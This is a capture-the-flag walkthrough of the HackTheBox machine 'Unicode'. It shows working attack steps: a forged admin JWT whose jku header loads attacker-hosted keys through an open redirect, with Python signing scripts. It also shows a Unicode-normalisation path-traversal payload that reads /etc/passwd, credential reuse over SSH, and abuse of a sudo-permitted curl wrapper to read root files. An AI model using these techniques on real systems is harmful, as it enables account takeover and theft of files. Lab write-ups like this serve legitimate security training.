Unicode — HackTheBox Machine WriteUp
This post is focused on the walkthrough of Medium level machine Unicode of Hackthebox.
Enumeration
Starting out with the initial nmap scan
nmap -A -vv 10.10.11.126
We have ports 22 and 80 open. So let’s enumerate port 80 now.
We have a webpage named Hackmedia.
Enumerating further we have a login page.
I tried SQL Injection but didn’t work so I registered an account and logged in using that to test the functionality.
We have a user dashboard. Next we can check the upload file functionality.
After testing this feature I couldn’t bypass it so I moved on to test some other things.
Gaining Access
Looking at the cookie we have a JWT Token.
Looking at the decoded token, there are a few things we can tweak to login as admin and escalate further.
I’ll be adding hackmedia.htb to the /etc/hosts file
echo “10.10.11.126 hackmedia.htb” | sudo tee -a /etc/hosts
Visiting the link above we have the following page.
Now here’s what we’ll be doing. First we’ll create another JWT key and replace the values in the above jwks.json file. Then we’ll link our own tweaked jwks.json file with the original JWT token.
The following command will generate a key pair
openssl genrsa -out key.pem 2048
The following python script will take our key pair file and print out the values we need to change in jwks.json file.
from jwcrypto import jwk, jwt
with open(‘key.pem’, ‘rb’) as pem:
key = jwk.JWK.from_pem(pem.read())print(f’{key}’)
print(f’n: {key.n}’)
We’ll replace the ’n’ and ‘kid’ value in the jwks.json file.
Now our jwks.json file is as follows
We’ll start a python http server to fetch our tweaked jwks.json file.
python3 -m http.server 80
The following script will regenerate the jwt token replacing the jwks.json file and change the value of user to admin.
from jwcrypto import jwk, jwt
with open(‘key.pem’, ‘rb’) as pem:
key = jwk.JWK.from_pem(pem.read())my_token = jwt.JWT(header={‘alg’:’RS256', ‘jku’:’http://hackmedia.htb/static/../redirect/?url=10.10.14.160/jwks.json'}, claims={‘user’:’admin’})
my_token.make_signed_token(key)
print(my_token.serialize())
Now looking at our token we have
Now we’ll replace our original token with the above token
Boom! we are logged in to the admin dashboard.
Now after testing for a while I came across that Current Month page could be vulnerable to LFI.
Accessing the following url we get
hackmedia.htb/display/?page=../../etc/passwd
Looking at the error message here we can assume there must be some sort of filtering. After looking around and trial & error, I bypassed the filtering and read the /etc/passwd file
http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd
We can see that we have a user named code.
From the initial nmap scan we know that the server is running on nginx so we can try to read the default nginx config file.
We can see that we have a db.yaml file and that could contain some valid credentials. Looking around for that file I found the file in the following path.
Boom! we have some creds. Let’s try these out in ssh.
ssh code@hackmedia.htb
And we’re in.
user.txt
Reading the user.txt file
Privilege Escalation
sudo -l
Running the above command we can see that our user can run /usr/bin/treport file as root.
Let’s run this file first to test the functionality
Testing out the functionality, I noticed that the binary has four options. The most important ones are 2 & 3. With option 3 we can download a file with an IP or file name and with option 2 we can read that file. Also the binary is using curl command to fetch the files.
root.txt
Since we can download the file through an IP or a file name, I downloaded the root.txt file and read it.
Thanks for reading!